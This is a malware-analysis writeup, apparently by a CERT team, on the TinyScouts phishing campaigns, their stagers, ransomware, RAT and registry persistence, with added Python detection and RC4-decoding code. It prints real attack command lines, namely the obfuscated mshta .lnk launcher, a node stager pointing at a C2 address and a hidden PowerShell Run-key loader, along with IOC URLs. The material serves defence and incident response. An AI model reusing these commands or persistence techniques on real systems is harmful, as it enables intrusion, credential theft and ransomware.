Slightly Harder Than It Looks: How TinyScouts Attack

Some time ago, we started recording attempts to infect our customers' infrastructures with previously unknown malware. It was delivered to users via phishing emails, some themed around the second wave of the coronavirus pandemic and some clearly tailored to the targeted organization and its line of business. The attackers impersonated various real companies, for example Norilsk Nickel, the Russian Union of Industrialists and Entrepreneurs, and Finauditservice.

Two aspects of the group's activity stood out: first, the attackers' high level of technical skill, and second, the variability of the attack scenario. If you are of no interest as a victim, they steal passwords and encrypt data; but if your machine sits in an interesting domain and offers potential for further development of the attack, they download a Remote Admin Tool (RAT) written in PowerShell. We named the group TinyScouts after function names in the malicious code. In this article we describe its two most recent campaigns, which can be roughly divided by month (July and August 2020), and give a full analysis of the TinyScouts tools and scripts.

July campaign. Direct download

In July, the malware was distributed as an .lnk file that executed the following command:

%comspec% /v /c set m=m^s^h^ta && set a=AKT-F^inAudit^Service.^docx.l^nk && if exist "!cd!\!a!" (!m! "!cd!\!a!") else (!m! !temp!\Temp1_A^ktWe^pki.z^ip\!a!)

Running mshta.exe executed an obfuscated JS script. Its task is to extract a decoy document from the body of the .lnk file, open it via rundll32.exe, and run an obfuscated PowerShell command. A fragment of the script after deobfuscation is shown below:

The script held in the toexecute variable downloads and runs another obfuscated PowerShell script, Decide (requested as decide.php). An example of its obfuscation is shown below:

This script's task is to check whether the computer meets certain criteria and then download the next payload from the servers. A fragment of the deobfuscated code is shown below:

It checks for the presence of TeamViewer, for RDP sessions, and for whether the machine is logged into a domain, in order to decide which payload to download. For an "interesting" system the RAT is downloaded, otherwise the encryptor. In both cases these are scripts obfuscated in several layers.

August Campaign (ongoing). Tor Hidden Services

In early August the delivery scheme changed: the emails now contained a link to download an SFX archive holding four files:

• document.doc. A decoy document that is opened for distraction and carries no malicious payload.
• 7za.exe. The 7-Zip command-line archiver.
• wget.exe. The original wget utility.
• service. The Stager 1 JS script.

When the SFX archive is run, the following happens:

1) document.doc is opened;
2) using wget and 7z, Tor and node.exe are downloaded and unpacked from the following links:

3) the Stager 1 script is launched with node.exe:
C:\Windows\System32\cmd.exe "/c if not exist hostname (node service 192.248[.]165.254)"

Below is the deobfuscated Stager 1 script:

The service script receives the address of the control server as an argument and, when launched, creates a Tor hidden service. It is worth noting that the hidden service's name is generated at launch and looks like that of any ordinary resource on the Tor network, for example vkss134jshs22yl3li2ul.onion. The script then sends the generated hidden service name to the attacker and starts a local web server. From then on, the attacker communicates with the infected system in request/response mode against that web server (line 19 in the code): requests carry code to execute and responses carry the results.

This architecture gives the attacker access to an infected system even when it sits behind NAT (the only requirement is Internet access) and removes the need to know the victim's public ("white") IP address.

The first request to the newly started web server delivers the Decider script, whose task is to determine whether the computer is joined to a domain and to obtain the username. This time the TeamViewer and RDP checks are absent:

After the results of the Decider script are sent to the attacker, a web request containing either the ransomware or the RAT, depending on the attacker's interest, is sent to the infected system.
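As an added defender-side example (not code from the original post), the following Python scans process-creation events for the two launch patterns quoted above: the caret-split mshta.exe command from the July .lnk and the August "cmd /c if not exist hostname (node service <ip>)" launcher. The event shape (Image, CommandLine) is an assumption modelled on Sysmon Event ID 1, every sample event is constructed, and the C2 address in them is a TEST-NET placeholder rather than the real one.

```python
"""Hunting the TinyScouts delivery chains over process-creation events.
Added example, not code from the original post. Event fields are modelled
on Sysmon Event ID 1; all events below are constructed."""
import re
from typing import Dict, List, Tuple


def normalize_cmd(cmdline: str) -> str:
    """Undo cmd.exe caret escaping so that split tokens such as m^s^h^ta
    read as mshta. cmd.exe removes unquoted carets before it runs the line,
    so matching on the normalized form sees what the interpreter saw."""
    return cmdline.replace("^", "")


RULES: List[Tuple[str, "re.Pattern"]] = [
    # July chain: mshta.exe invoked on a .lnk file, whether caret-split in the
    # parent cmd.exe line or in the clear on the mshta.exe child process.
    ("mshta_on_lnk", re.compile(r"\bmshta(?:\.exe)?\b.*\.lnk\b", re.I)),
    # August chain: "if not exist hostname (node service <C2 ip>)". The
    # hostname file is what Tor writes once the hidden service exists, so the
    # launcher only starts the stager when no hidden service is present yet.
    ("node_service_launcher", re.compile(
        r"if\s+not\s+exist\s+hostname\s*\(\s*node\s+service\s+"
        r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})", re.I)),
]


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return one finding per (event, rule) hit, with the C2 address when a
    rule captured one and a flag telling whether carets hid the command."""
    findings: List[Dict[str, object]] = []
    for event in events:
        raw = event["CommandLine"]
        norm = normalize_cmd(raw)
        for name, rx in RULES:
            m = rx.search(norm)
            if m:
                findings.append({
                    "rule": name,
                    "image": event["Image"],
                    "caret_obfuscated": raw != norm,
                    "c2": m.groupdict().get("ip"),
                })
    return findings


# Constructed events. The first mirrors the .lnk command quoted in the post as
# cmd.exe would record it; 203.0.113.10 stands in for the real C2 address.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'C:\Windows\System32\cmd.exe /v /c set m=m^s^h^ta && set a=AKT-F^inAudit^Service.^docx.l^nk && if exist "!cd!\!a!" (!m! "!cd!\!a!") else (!m! !temp!\Temp1_A^ktWe^pki.z^ip\!a!)'},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta "C:\Users\jdoe\Downloads\AKT-FinAuditService.docx.lnk"'},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'C:\Windows\System32\cmd.exe "/c if not exist hostname (node service 203.0.113.10)"'},
    # Benign activity that must not fire: a plain dir, a legitimate HTA, and
    # an ordinary node.js service script.
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c dir C:\Users\jdoe\Documents"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta C:\Tools\inventory.hta"},
    {"Image": r"C:\Program Files\nodejs\node.exe",
     "CommandLine": "node service.js --port 8080"},
]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The caret normalization is the part worth keeping: the .lnk never writes the string "mshta" to disk or to the parent command line, so a rule that only looks at the raw field misses the first event and sees only the mshta.exe child, while a rule over the normalized line catches both.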

Common modules in both campaigns

Stager 3 script

The main script contains five components encoded in base64:
• Encryptor ransomware
• Readme file with a message from the intruders
• WebBrowserPassView utility
• Mail PassView utility
• Injector. An executable used to inject WebBrowserPassView and Mail PassView into an svchost process; the injection uses the common RunPE method.

Stager 3 script functions:

1) Launching the ransomware (Get-Stuff function)
Below is a fragment of the script code that launches the ransomware:

2) Bypassing UAC (needed to delete shadow copies)
The code contains three techniques, using cmstp.exe, CompMgmtLauncher.exe and fodhelper.exe respectively. You can read about them here, here and here.

3) Deleting shadow copies

4) Launching WebBrowserPassView and Mail PassView
These are Nirsoft utilities for extracting saved passwords from browsers and email clients respectively.

5) Sending the reports produced by these utilities to the command-and-control server.
Before sending, the reports are encrypted with RC4 using a generated 4-character key:

The key itself is placed at the beginning of the message:

Encryptor ransomware

The readme message looks like this:

The ransomware is an unobfuscated .NET executable. Files are encrypted with AES; a separate key and initialization vector are generated for each file, then encrypted with an RSA public key and stored inside the encrypted file. The main function of the ransomware is shown below:


RAT

The RAT script has several layers of obfuscation. After deobfuscation it can execute the following commands:
delete – self-removal
exec – execute a PowerShell command
download – file upload
set_wait_time – change the command polling interval
update_tiny – update the RAT
run_module – execute a block of PowerShell commands
add_persist_module – add a PowerShell module to the system that will be executed each time the RAT starts
remote_persist_module – remove a module from the RAT startup list

The deobfuscated command processing function is shown below:

Persistence method

Two registry keys are used for persistence:

1) HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. The following command is placed in this key (shown deobfuscated):
cmd /c PowerShell -windowstyle hidden -nop -c "iex (Get-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Windows -Name

2) HKCU\SOFTWARE\Microsoft\Windows. The script is stored here in a value named client_id. Thus, at system start, the command from the Run key reads the script from this value and runs it.
client_id is a string of the form AppX + base64(hostname + username + campaign_id)

The persistence function looks like this:

The decrypted script placed in the Run key:

Note that the malware body is stored neither on disk nor in the registry: it is downloaded afresh each time by the script above.
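As an added analyst example (not code from the original post), the following Python looks for this persistence pattern in a registry export: a Run value that starts a hidden PowerShell which iex-es a value read with Get-ItemProperty, the second registry location that holds the loader, and the AppX + base64 naming of client_id. The export text below is constructed. The Run command quoted above is truncated after -Name, so the tail of the command in the sample, the separator used between hostname, username and campaign_id, and the payload text are all assumptions.

```python
"""Find the registry-resident TinyScouts loader in a 'reg export' text dump.
Added example, not code from the original post; the export is constructed."""
import base64
import re
from typing import Dict, List, Optional, Tuple

# Constructed client_id: "AppX" + base64(hostname + username + campaign_id).
# The post does not say how the three parts are joined; '|' is assumed here.
CLIENT_ID = "AppX" + base64.b64encode(b"WS-042|jdoe|campaign_EXAMPLE").decode()

# Constructed export in the format written by reg.exe. The "svc" command
# mirrors the deobfuscated Run value from the post; everything after -Name
# is a constructed completion, since the post's quote stops there.
REG_EXPORT = rf'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\jdoe\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"svc"="cmd /c PowerShell -windowstyle hidden -nop -c \"iex (Get-ItemProperty -Path HKCU:\\SOFTWARE\\Microsoft\\Windows -Name {CLIENT_ID}).{CLIENT_ID}\""

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows]
"{CLIENT_ID}"="<constructed placeholder for the loader script that downloads the RAT body>"
'''

VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')


def _unescape(s: str) -> str:
    """reg export escapes backslash and double quote with a backslash."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg_export(text: str) -> Dict[Tuple[str, str], str]:
    """Map (KEY in upper case, value name) -> string data.
    Only REG_SZ lines ("name"="data") are kept; other types are skipped."""
    values: Dict[Tuple[str, str], str] = {}
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1].upper()
            continue
        m = VALUE_RE.match(line)
        if key is not None and m:
            values[(key, _unescape(m.group(1)))] = _unescape(m.group(2))
    return values


# The loader shape from the post: iex over a value fetched with
# Get-ItemProperty -Path <key> -Name <value>. The -Name token is limited to
# the characters an AppX+base64 name can contain.
LOADER_RE = re.compile(
    r"iex\s*\(\s*Get-ItemProperty\s+-Path\s+(?P<path>\S+)\s+-Name\s+(?P<name>[\w+/=]+)",
    re.I)
RUN_KEY = r"HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN"
HIVES = {"HKCU": "HKEY_CURRENT_USER", "HKLM": "HKEY_LOCAL_MACHINE"}


def resolve_ps_path(ps_path: str) -> str:
    """Turn a PowerShell registry path (HKCU:\A\B) into export form, upper case."""
    hive, _, rest = ps_path.partition(":")
    return (HIVES.get(hive.upper(), hive) + rest).upper()


def decode_client_id(name: str) -> Optional[str]:
    """Decode an AppX<base64> value name; None if it does not fit the pattern."""
    if not name.startswith("AppX"):
        return None
    try:
        return base64.b64decode(name[4:], validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def find_registry_loaders(values: Dict[Tuple[str, str], str]) -> List[Dict[str, object]]:
    """Flag Run entries that load their body from another registry value and
    report whether that value exists and what its name decodes to."""
    findings: List[Dict[str, object]] = []
    for (key, name), data in values.items():
        if key != RUN_KEY:
            continue
        m = LOADER_RE.search(data)
        if not m:
            continue
        target = (resolve_ps_path(m.group("path")), m.group("name"))
        findings.append({
            "run_value": name,
            "hidden_window": "-windowstyle hidden" in data.lower(),
            "payload_key": target[0],
            "payload_value": target[1],
            "payload_present": target in values,
            "client_id": decode_client_id(target[1]),
        })
    return findings


if __name__ == "__main__":
    for finding in find_registry_loaders(parse_reg_export(REG_EXPORT)):
        print(finding)
```

Because the RAT body itself is never written to disk or the registry, the Run value and the loader value it points to are the only durable artifacts on the host; decoding the value name also yields the hostname, username and campaign identifier the operators used, which is useful for scoping an incident across machines.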

The add_persist_module command

The RAT can add PowerShell modules that run at every startup. A separate registry key stores the module identifiers; at startup this key is read and the malware requests all modules from the server by identifier.

When the malware starts, the Load-AllPersistModules function runs all added modules:

Like the main RAT body, the module code is stored neither on disk nor in the registry.

Server interactions

The code contains a CampaignID constant that is used as the encryption key when the RAT registers at startup (register-tiny function); the algorithm is RC4. After the initial system information is sent, the server's response contains the encryption key that will be used from then on with the same algorithm.
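Both RC4 usages described in this post, the Stager 3 reports with a generated 4-character key prepended to the ciphertext (item 5 above) and the RAT registration keyed by CampaignID with a server-supplied key afterwards (this section), can be decoded with the same small routine. The following Python is an added analyst example, not code from the original post or from the malware. It assumes that the 4-character key is raw bytes immediately followed by the ciphertext with no separator, that the server reply is itself RC4-encrypted under the CampaignID with the new key as its whole plaintext, and that the CampaignID placeholder and every message below are constructed.

```python
"""RC4 decoders for captured TinyScouts traffic. Added example, not code from
the original post; message layouts are assumptions stated in the text."""
from typing import Dict, Tuple


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def split_report(message: bytes, key_len: int = 4) -> Tuple[bytes, bytes]:
    """Stager 3 report: the generated key is the first key_len bytes and the
    RC4 ciphertext is everything after it (layout assumed). Returns
    (key, plaintext) so the analyst can see the key the sample used."""
    if len(message) <= key_len:
        raise ValueError("message too short to hold a key and ciphertext")
    key, body = message[:key_len], message[key_len:]
    return key, rc4(key, body)


def decrypt_rat_session(campaign_id: str, registration: bytes,
                        server_reply: bytes, later_message: bytes) -> Dict[str, bytes]:
    """RAT registration: CampaignID keys the first request and the server's
    reply; the reply's plaintext is the key for all later traffic (assumed)."""
    cid = campaign_id.encode()
    session_key = rc4(cid, server_reply)
    return {
        "registration": rc4(cid, registration),
        "session_key": session_key,
        "later": rc4(session_key, later_message),
    }


# Constructed placeholders; the real CampaignID lives in the RAT script.
CAMPAIGN_ID = "CAMPAIGN_ID_PLACEHOLDER"
SESSION_KEY = b"example-session-key"


def build_samples() -> Tuple[bytes, bytes, bytes, bytes]:
    """Construct a captured report and a registration exchange with the same
    primitive, so the decoders above have realistic input to work on."""
    report = b"browser: saved logins extracted (constructed sample)"
    report_msg = b"k3y7" + rc4(b"k3y7", report)          # 4-char key prepended
    reg_msg = rc4(CAMPAIGN_ID.encode(), b"host=WS-042;user=jdoe;domain=yes")
    reply_msg = rc4(CAMPAIGN_ID.encode(), SESSION_KEY)   # server hands out key
    later_msg = rc4(SESSION_KEY, b"cmd=set_wait_time;value=60")
    return report_msg, reg_msg, reply_msg, later_msg


if __name__ == "__main__":
    report_msg, reg_msg, reply_msg, later_msg = build_samples()
    print(split_report(report_msg))
    print(decrypt_rat_session(CAMPAIGN_ID, reg_msg, reply_msg, later_msg))
```

The practical point for incident response is that the report traffic carries its own key, so a captured stat_launch or stat_fin upload can be read back without any sample-specific secret, while RAT traffic after registration needs the CampaignID from the script (or the first server reply) to recover the session key.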

Indicators of Compromise:

https[://]late-salad-2839.yriqwzjskbbg.workers[.]dev/raw_stat/stat_launch.php
https[://]late-salad-2839.yriqwzjskbbg.workers[.]dev/raw_stat/stat_fin.php
https[://]late-salad-2839.yriqwzjskbbg.workers[.]dev/web/index.php?r=bag

Post authors:
Igor Zalevsky, Head of Cyber ​​Incidents Investigation Department, JSOC CERT
Asker Jamirze, JSOC CERT Technical Investigation Expert
